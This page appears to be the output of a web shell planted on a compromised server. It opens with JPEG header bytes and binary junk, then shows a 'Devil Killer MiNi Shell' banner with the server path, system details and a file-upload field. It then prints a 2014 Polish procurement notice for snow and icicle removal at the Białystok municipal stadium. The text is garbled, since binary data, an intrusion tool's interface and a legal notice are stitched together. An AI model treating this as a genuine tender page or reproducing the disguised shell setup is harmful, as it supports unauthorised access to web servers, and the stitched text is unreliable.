JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141003/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141003/327904-N-2014.html

<p class="kh_header"><b>Białystok: Przedmiotem niniejszego zamówienia jest usługa odśnieżania, usuwania nawisów śnieżnych i zwisających sopli na terenie Stadionu Miejskiego w Białymstoku</b><br>
<b>Numer ogłoszenia: 327904 - 2014; data zamieszczenia: 03.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Stadion Miejski Sp. z o.o. , ul. Lipowa 32 lok. 304, 15-428 Białystok, woj. podlaskie, tel. 85 66 10 802, faks 85 66 10 802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stadion.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnoscią.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia jest usługa odśnieżania, usuwania nawisów śnieżnych i zwisających sopli na terenie Stadionu Miejskiego w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest usługa odśnieżania, usuwania nawisów śnieżnych i zwisających sopli na terenie Stadionu Miejskiego w Białymstoku, zwana dalej usługą z podziałem na części:
Część A - odśnieżanie, usuwanie nawisów śnieżnych i zwisających sopli z dachu Stadionu Miejskiego w Białymstoku,
Część B - odśnieżanie i usuwanie śniegu z trybun, ciągów pieszych, parkingów i dróg dojazdowych oraz posypywanie śliskich powierzchni Stadionu Miejskiego w Białymstoku.

Wykonawca będzie zobowiązany do monitorowania opadów śniegu 24 godziny na dobę, 
a w przypadku ich wystąpienia, nasilenia, będzie zobowiązany do podjęcia interwencji odśnieżania, przez 7 dni w tygodniu, uprzednio powiadamiając o tym Zamawiającego i wykonując dokumentację fotograficzną. Zamawiający w takim przypadku będzie miał prawo do oceny czy interwencja jest zasadna.

Wykonawca zobowiązany będzie wywieźć na własny koszt cały usunięty śnieg, lód oraz inne pozostałości z odśnieżonych powierzchni po wykonanej usłudze. Czynność wywozu należy wykonać niezwłocznie, jednak nie później niż do godziny 12-tej następnego dnia po dniu, w którym śnieg, lód oraz inne pozostałości wykonania usługi zostały na teren wykonywania usługi zrzucone.
Wykonawca w czasie trwania umowy jest zobowiązany do utrzymywania stałej gotowości do działań prewencyjnych, w ramach których jest zobowiązany do:
a)ciągłego monitorowania opadów i reakcji w przypadku ich nasilenia, 
b)zapobieganiu powstawania nawisów śnieżnych i sopli, a w przypadku powstania niezwłocznego usuwania, nawet w przypadku niewielkich opadów,
Wykonawca do realizacji zamówienia skieruje każdorazowo taką ilość osób, aby zapewnić wykonanie przedmiotu umowy w możliwie jak najkrótszym terminie, ale nie dłuższym niż 36 godziny
Wykonawca zabezpieczy miejsca, gdzie będzie składowany śnieg i lód przed dostępem osób trzecich,
Wykonawca oprócz usuwania śniegu będzie zobowiązany posypywać wskazane miejsca, aby zabezpieczyć przed śliskością.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, zgodnie z art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu tego samego rodzaju usług stanowiących nie więcej niż 40 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium, zgodnie z art. 45 ust. 1 ustawy, w wysokości:
1)	dla części A - 7 000,00 zł,
2)	dla części B - 4 000,00 zł,
Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu, 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2)	gwarancjach bankowych,
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy: 85 1240 1154 1111 0010 3579 7475 Bank  PEKAO S.A. w Białymstoku.
Wadium wnoszone w formie gwarancji lub poręczeni, o którym mowa w art. 45 ust 6 pkt. 2) - 5) ustawy Pzp wystawione na Stadion Miejski Sp. z o.o. należy złożyć oryginał dokumentu wraz z ofertą w siedzibie  Stadion Miejski Sp. Z o.o., ul. Lipowa 32 lok 304, 15-428 Białystok.
Z treści gwarancji, poręczenia musi wynikać nieodwołalne i bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego tj. stadion Miejski Sp. z o.o., w terminie związania ofertą - zobowiązanie gwaranta, poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 46 ust. 4a i 5 ustawy Pzp.
Wadium należy wnieść do upływu terminu składania ofert. Za skuteczne wniesienie wadium  w pieniądzu zamawiający uważa wadium, które w tym terminie znajdzie się na koncie zamawiającego. 
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem Rozdział XI, pkt. 9 SIWZ
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba, że udowodni, ze wynika to z przyczyn nieleżących po jego stronie.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie Rozdział XI, pkt. 8 SIWZ, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie części A:
Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum jedną usługę tego samego rodzaju, tj. usługę odśnieżania dachu z płyt poliwęglanowych o powierzchni min. 5 000 m2, o wartości nie mniejszej niż 20 000,00 zł brutto. 

W zakresie części B:
Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, minimum  2 usługi tego samego rodzaju, tj. odśnieżania powierzchni o wartości nie mniejszej niż 50 000,00 zł brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku dysponowania zasobami podmiotu trzeciego - zgodnie z art. 26 ust. 2b ustawy, wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, wykonawca w takiej sytuacji, jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażając w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy, ubiegającemu się o zamówienie, odpowiedniego zasobu, czyli wskazać jego zakres, rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu. Z treści dokumentu musi jasno wynikać:
a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu,
b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem,
d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia. 
Dowodami potwierdzajacymi należyte wykonanie usług o których mowa w rozdz. VIII ust. 1 pkt 2 SIWZ są:
a) poświadczenie, z tym, że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, 
b) w przypadku zamówień na dostawy lub usługi - oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w lit. a),
c) w przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa w ust. 1 pkt 2 SIWZ , zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w lit. a i b).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy, w stosunku 
do treści oferty Wykonawcy, w następującym zakresie i okolicznościach:
1) wynagrodzenia - w przypadku zmiany stawki podatku od towarów i usług, 
2) w przypadku zmian organizacyjnych dotyczących Zamawiającego, w tym z uwzględnieniem zmian z zakresu działalności i przekształceń.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.stadion.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Stadion Miejski Sp. z o.o.
ul. Lipowa 32 lok 304 
15-428 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.10.2014 godzina 11:00, miejsce: Stadion Miejski Sp. z o.o.
ul. Lipowa 32 lok 304 
15-428 Białystok
III piętro Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A - odśnieżanie, usuwanie nawisów śnieżnych i zwisających sopli z dachu Stadionu Miejskiego w Białymstoku,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia w Część A:
- powierzchnia dachu - ok. 16 800 m2, wizualizacja dachu projektu powykonawczego  w załączeniu,
- Zamawiający przewiduje max. 3 pełne cykle odśnieżania, przy czym Zamawiający dopuszcza zmiany ilościowe w zakresie realizacji przedmiotu zamówienia zarówno w tych częściach, jak i poszczególnych ich elementach, 
Wykonawca zobowiązany jest, w formularzu ofertowym, podać kwotę odśnieżania, za m2 powierzchni odśnieżanej oraz opłatę miesięczną za gotowość. Zamawiający przyjmuje formę rozliczania za faktycznie odśnieżoną powierzchnię oraz za gotowość.
Wykonawca będzie zobowiązany w ciągu 10 dni od podpisania umowy, w uzgodnieniu z projektantem i wykonawcą stadionu oraz wykonawcą zadaszenia, do opracowania Instrukcji  Odśnieżania Dachu i stosowania się do niej przy wykonywaniu przedmiotu zamówienia, uwzględniając podane niżej wskazówki i ograniczenia oraz informacje podane w  Instrukcji użytkowania pokrycia dachu nad trybunami Stadionu Piłkarskiego w Białymstoku wykonawcy dachu oraz informacji od projektanta, zgodnie z załącznikiem nr 7 do SIWZ:
- materiał z którego wykonany został dach - konstrukcja aluminiowa wraz z wypełnieniem poliwęglanem komorowym,
- po dachu należy poruszać się w obrębie pomostu technicznego, a w przypadku płyt poliwęglanowych (na których nie wolno stawać), na przenośnym trapie opartym na profilach aluminiowych ram poliwęglanu,
- w przypadku ekstremalnym (zamarznięcie i brak możliwości otworzenia wszystkich włazów dachowych) istnieje możliwość dostania się na poziom dachu z zewnętrznego podnośnika (zapewnia Wykonawca) lub z poziomu 4 metodą alpinistyczną,
- monitorowanie ciężaru warstwy śniegu na dachu należy do Wykonawcy - przy przyjętych obciążeniach pokrycia dachowego, odśnieżanie bezwzględnie wskazane jest przy ca 30 cm warstwie śniegu, przy czym określenie grubości warstwy śniegu, przy której dach wymaga odśnieżania, ze względu na wystąpienie obfitych opadów, nie jest możliwe (ze względu na średni ciężar objętościowy śniegu może różnić się od ~ 1,0 kN-m3 do ~4,0 kN-m3  w zależności od jego struktury),
- nie wolno stosować soli oraz substancji chemicznych do usuwania oblodzenia i śniegu,
- zabronione jest kucie i skrobanie ewentualnych oblodzeni, a śnieg nie może być wybierany w całości, aby nie uszkodzić powierzchni płyty,
- sprzęt do odśnieżania nie może mieć metalowych i ostrych krawędzi,
- prace należy prowadzić w taki sposób, aby nie uszkodzić i nie zniszczyć żadnych  z  istniejących na dachu instalacji, systemów i urządzeń,
- miejsca, gdzie będzie spadał śnieg i lód należy odpowiednio zabezpieczyć przed dostępem osób trzecich,  a także aby zrzucany śnieg i lód nie uszkodził ścian budynku, 
- wszelkie prace prowadzone na powierzchni dachu powinny być ewidencjonowane w książce serwisowej z informacjami: data czynności, czas trwania, opis czynności i ich uzasadnienie, ilość i nazwiska osób dopuszczonych do prac, podpis osoby odpowiedzialnej za dopuszczenie do pracy na dachu (wypełniane są przed przystąpieniem do prac), uwagi wniesione po wykonaniu czynności,
Zamawiający zastrzega sobie prawo do zgłaszania uwag do instrukcji odśnieżania opracowanej przez Wykonawcę,
Wykonawca w czasie trwania umowy jest zobowiązany do utrzymywania stałej gotowości  do działań prewencyjnych, w ramach których jest zobowiązany do:
- ciągłego monitorowania opadów i reakcji w przypadku ich nasilenia, 
- zapobieganiu powstawania nawisów śnieżnych i sopli, a w przypadku powstania niezwłocznego usuwania, nawet w przypadku niewielkich opadów,
Wykonawca do realizacji zamówienia skieruje każdorazowo taką ilość osób, aby zapewnić wykonanie przedmiotu umowy w możliwie jak najkrótszym terminie, ale nie dłuższym niż  36 godziny, 
W przypadku konieczności odśnieżenia powierzchni dachu w dzień poprzedzający imprezę na stadionie, Wykonawca zapewni wykonanie przedmiotu zamówienia w terminie nie dłuższym niż 24 godziny, umożliwiając przeprowadzenie imprezy
Wymagania, jakie muszą spełniać Wykonawcy w trakcie realizacji umowy:
- członkowie zespołu Wykonawcy muszą posiadać uprawnienia alpinistyczne do wykonywania  usług będących przedmiotem zamówienia, 
- Wykonawca musi dysponować osobami posiadającymi odpowiednie kwalifikacje oraz aktualne zezwolenia uprawniające do pracy na wysokościach powyżej 3 m, jak również aktualne badania lekarskie zezwalające na pracę na wysokości,
- środki ochrony osobistej oraz wyposażenia zabezpieczającego osób wykonujących pracę  na wysokości muszą posiadać atest z aktualną datą ważności,
- osoby wykonujące usługę, znajdujące się na dachu również w miejscach odległych od krawędzi dachu, muszą być zabezpieczone szelkami i linkami asekuracyjnymi mocowanymi do stałych części stalowych dachu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B - odśnieżanie i usuwanie śniegu z trybun, ciągów pieszych, parkingów i dróg dojazdowych oraz posypywanie śliskich powierzchni Stadionu Miejskiego w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Powierzchnia z Tabeli nr 1 i Tabeli nr 2, Zał. Nr 2 do SIWZ będzie rozliczana na zasadzie opłaty za m2, powierzchnie te można odśnieżać z użyciem maszyn. Zamawiający przyjmuje formę rozliczania za faktycznie odśnieżoną powierzchnię.
